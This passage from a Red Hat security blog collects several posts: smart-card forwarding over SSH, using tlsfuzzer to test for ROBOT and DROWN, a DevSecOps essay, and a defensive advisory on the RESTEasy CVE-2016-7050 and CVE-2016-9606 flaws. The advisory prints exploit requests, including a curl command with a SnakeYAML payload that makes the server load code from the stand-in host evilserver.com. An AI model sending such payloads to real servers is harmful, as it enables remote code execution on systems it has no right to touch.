    The number at the end of the path above is your user ID in that system (and thus will vary from user to user). You can now forward the Unix domain socket with the -R option of the ssh command (after replacing the example path with the actual run-time path):

     $ ssh -R /run/user/<userID>/p11-kit/pkcs11:${P11_KIT_SERVER_ADDRESS#*=} <user>@<remotehost>
    

    After successfully logging in to the remote host, you can use the forwarded smart card as if it were directly connected to the server. Note that if any error occurs in setting up the forwarding, you will see something like this on your terminal:

    Warning: remote port forwarding failed for listen path /run/user/...
    

    Using the forwarded PKCS#11 socket

    Let’s first make sure it works by listing the forwarded smart card:

     $ ls -l /run/user/1000/p11-kit/pkcs11
     $ p11tool --provider /usr/lib64/pkcs11/p11-kit-client.so --list-tokens
     ...
     Token 0:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: (null)
     ...
    

    We can similarly generate, copy objects or test certificates to the card using the same command. Any applications which support PKCS#11 can perform cryptographic operations through the client module.

    Registering the client module for use with OpenSSL and GnuTLS apps

    To utilize the p11-kit-client module with OpenSSL (via engine_pkcs11 provided by the libp11 package) and GnuTLS applications in Fedora, you have to register it with p11-kit. To do it for the current user, use the following commands:

    $ mkdir .config/pkcs11/modules/
    $ echo “module: /usr/lib64/pkcs11/p11-kit-client.so” >.config/pkcs11/modules/p11-kit-client.module
    

    Once this is done both OpenSSL and GnuTLS applications should work, for example:

    $ URL=”pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29”
    
    # Generate a key using gnutls’ p11tool
    $ p11tool --generate-ecc --login --label test-key “$URL”
    
    # generate a certificate request with the previous key using openssl
    $ openssl req -engine pkcs11 -new -key "$URL;;object=test-key;type=private;pin-value=XXXX" \
             -keyform engine -out req.pem -text -subj "/CN=Test user"
    

    Note that the token URL remains the same in the forwarded system as in the original one.

    Using the client module with OpenSSH

    To re-use the already forwarded smart card for authentication with another remote host, you can run ssh and provide the -I option with p11-kit-client.so. For example:

     $ ssh -I /usr/lib64/pkcs11/p11-kit-client.so <user>@<anotherhost>
    

    Using the forwarded socket with NSS applications

    To register the forwarded smart card in NSS applications, you can set it up with the modutil command:

     $ sudo modutil -dbdir /etc/pki/nssdb -add p11-kit-client -libfile /usr/lib64/pkcs11/p11-kit-client.so
     $ modutil -dbdir /etc/pki/nssdb -list
     ...
       3. p11-kit-client
         library name: /usr/lib64/pkcs11/p11-kit-client.so
            uri: pkcs11:library-manufacturer=OpenSC%20Project;library-description=OpenSC%20smartcard%20framework;library-version=0.17
          slots: 1 slot attached
         status: loaded
    
          slot: Nitrokey Nitrokey HSM (010000000000000000000000) 00 00
         token: UserPIN (Daiki's token)
           uri: pkcs11:token=UserPIN%20(Daiki's%20token);manufacturer=www.CardContact.de;serial=DENK0000000;model=PKCS%2315%20emulated
    

    Conclusion

    With the smart card forwarding described, we make it easy to forward your smart card, or any device accessible under PKCS#11, to the “cloud”. The forwarded device can then be used by OpenSSL, GnuTLS, and NSS applications as if it was a local card, enabling a variety of applications which were not previously possible.

    Posted: 2018-01-16T14:30:00+00:00
  • Detecting ROBOT and other vulnerabilities using Red Hat testing tools.

    Authored by: Hubert Kario

    The TLS (Transport Layer Security) protocol, also known as SSL, underpins the security of most Internet protocols. That means the correctness of its implementations protects the safety of communication across network connections.

    The Red Hat Crypto Team, to verify the correctness of the TLS implementations we ship, has created a TLS testing framework which is developed as the open source tlsfuzzer project. That testing framework is being used to detect and fix issues with the OpenSSL, NSS, GnuTLS, and other TLS software we ship.

    Recently, Hanno Böck, Juraj Somorovsky, and Craig Young, responsible for discovery of the ROBOT vulnerability, have identified that tlsfuzzer was one of only two tools able to detect the vulnerability at the time they discovered it. This article describes how to use tlsfuzzer to test for two common vulnerabilities - DROWN and ROBOT (which is an extension of the well known Bleichenbacher attack).

    Getting tlsfuzzer

    tlsfuzzer requires three Python libraries:

    six is available in Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7 and can be installed using the following command:

    yum install python-six
    

    In Fedora both Python 2 and Python 3 are available, so it needs to be installed using
    the following command:

    dnf install python2-six
    

    Note: tlsfuzzer and its dependencies are compatible with Python 2.6, Python 2.7, and Python 3, but because Python 2 is the default python on the above mentioned systems, the instructions below will use Python 2 to run it.

    Remaining libraries can be downloaded to a single directory and run from there:

    git clone https://github.com/tomato42/tlsfuzzer.git                             
    cd tlsfuzzer                                                                    
    git clone https://github.com/warner/python-ecdsa .python-ecdsa                  
    ln -s .python-ecdsa/src/ecdsa/ ecdsa                                            
    git clone https://github.com/tomato42/tlslite-ng .tlslite-ng                    
    ln -s .tlslite-ng/tlslite/ tlslite
    

    Running tests

    The tests that can be run live in scripts/ directory. The test for ROBOT (and Bleichenbacher) is called test-bleichenbacher-workaround.py. The test for DROWN is called test-sslv2-force-cipher.py.

    To run those scripts, it's necessary to provide them with the hostname and port the server is running on. For a server running on host example.com on port 443, the commands are as follows:

    PYTHONPATH=. python scripts/test-sslv2-force-cipher.py -h example.com -p 443
    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py -h example.com -p 443
    

    If the test finishes with a summary like this:

    Test end
    successful: 21
    failed: 0
    

    It means the server passed the tests successfully (behaves in a standards-compliant way) and likely is not vulnerable.

    Note: The server can be vulnerable to the Bleichenbacher attack even if it passes the test (as the attack can use timing of the responses, not only contents or presence). As this script does not measure times of the responses, it cannot detect that covert channel. Passing the test does mean that the attack is much harder to perform, if the server is vulnerable in reality.

    Many scripts support additional options that may workaround some peculiarities of the server under test. A listing of them can be obtained by running the script with --help option.

    Interpreting failures

    Unfortunately, as the tool is primarily aimed at developers, interpreting the errors requires a bit of python knowledge and understanding of TLS. Below is a description of the most common harmless errors that can happen during execution of the script.

    Tests in general verify if the server under test is RFC-compliant (does it follow standards like RFC 5246). As the standards are continuously updated to workaround or mitigate known vulnerabilities, standards compliance is a good indicator of overall robustness of the implementation. Fortunately, not all departures from behaviour prescribed in the RFCs are vulnerabilities. It does, however, make testing of such non-compliant implementations harder, and more of a guesswork though.

    That being said, some errors in test execution may be a result of unexpected server configuration rather than mismatch between expectation of tlsfuzzer and the server. Read below how to workaround them.

    Note: A Failure reported by a script is an indicator of a server not following the expected behaviour, not of failure to communicate. Similarly, a successful test is a test in which server behaved as expected, and does not indicate a successful connection.

    General error

    When execution of a script encounters an error, it will print a message like this:

    zero byte in first byte of random padding ...
    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert object at 0x7f96e7e56a90> (child: <tlsfuzzer.expect.ExpectClose object at 0x7f96e7e56ad0>) with last message being: <tlslite.messages.Message object at 0x7f96e79f4090>
    Error while processing
    Traceback (most recent call last):
      File "scripts/test-bleichenbacher-workaround.py", line 250, in main
        runner.run()
      File "/root/tlsfuzzer/tlsfuzzer/runner.py", line 178, in run
        node.process(self.state, msg)
      File "/root/tlsfuzzer/tlsfuzzer/expect.py", line 571, in process
        raise AssertionError(problem_desc)
    AssertionError: Expected alert description "bad_record_mac" does not match received "handshake_failure"
    

    First line indicates the name of the scenario that was run, it can be used to reproduce the run alone (by passing it as the last parameter to the script file, like this: ...workaround.py -h example.com -p 443 "zero byte in first byte of random padding").

    Second line indicates at which point in execution the failure happened, in this case during ExpectAlert.

    Last line indicates the kind of error condition that was detected, in this case the description of the received alert message didn't match the expected one.

    Connection refused or timeout in Connect error Pattern:

    Error encountered while processing node <tlsfuzzer.messages.Connect ...
    ...
        sock.connect((self.hostname, self.port))
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    error: [Errno 111] Connection refused
    

    and

    Error encountered while processing node <tlsfuzzer.messages.Connect...
    ...
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    timeout: timed out
    

    The hostname or the port are incorrect for the server or some system on-route blocks communication with the server.

    Unexpected message - Certificate Request Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectServerHelloDone
    ...
    AssertionError: Unexpected message from peer: Handshake(certificate_request)
    

    The server is configured to perform client certificate based authentication and the script does not know how to handle it. The server needs to be reconfigured to not request certificate from the client to perform that test.

    Unexpected message - Application Data Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert ...
    ...
    AssertionError: Unexpected message from peer: ApplicationData(len=8000)
    

    Note: for most tests it will be ExpectAlert, but in general, the node in question
    is the one right after ExpectApplicationData in the script.

    In the above mentioned test scripts, that is not an indication of ROBOT or DROWN vulnerability, but it may indicate other issues. The USAGE.md document of the tlsfuzzer project includes more information about interpreting this and other failures.

    Posted: 2017-12-12T13:56:54+00:00
  • Security is from Mars, Developers are from Venus…...or ARE they?

    Authored by: Christopher Robinson

    It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It has been well-known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but it also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.

    Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.

    Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.

    Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re also equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked-off a new site topic that focuses on secure programing and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.

    In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!

    Posted: 2017-11-16T15:00:00+00:00
  • Abuse of RESTEasy Default Providers in JBoss EAP

    Authored by: Jason Shepherd

    Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the Content-Type HTTP Header which the client specifies. Some of the default providers where found to have vulnerabilities which have now been removed from JBoss EAP and it's upstream Restful webservice project, RESTEasy.

    The attack vector

    There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:

    • @Consumes annotation was present specifying wildcard mediaType {*/*}
    • @Consumes annotation was not present on webservice endpoint
    • Webservice endpoint consumes a multipart mediaType

    Here's an example of what a vulnerable webservice would look like:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice how there is no @Consumes annotation on the doConcat method.

    The vulnerabilities

    CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

    If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending a HTTP Request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializationProvider and could contain a malicious payload generated with ysoserial2 or similar. A remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

    Here's an example:

    curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
    

    CVE-2016-9606 also exploited the default providers of Resteasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the Snakeyaml library from Resteasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

    SnakeYaml allows loading classes with a URLClassloader, using it's ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.

    An example of a malicious request is as follows:

    curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
    

    Where evilserver.com is a host controlled by the malicious actor

    Again, you can see the use of Content-Type, HTTP Header, which tricks RESTEasy into using YamlProvider, even though the developer didn't intend for it to be accessible.

    How to stay safe

    The latest versions of EAP 6.4.x, and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either of EAP 6.4.x, or 7.0.x.

    If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            @Consumes("application/json")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice this safe version added a @Consumes annotation with a mediaType of application/json

    This is good practice anyway, because if a HTTP client tries to send a request with a different Content-Type HTTP Header the application will give an appropriate error response, indicating that the Content-Type is not supported.


    1. https://issues.jboss.org/browse/RESTEASY-1269 

    2. https://github.com/frohoff/ysoserial 

    Posted: 2017-10-18T13:30:00+00:00
Close

Welcome! Check out the Getting Started with Red Hat page for quick tours and guides for common tasks.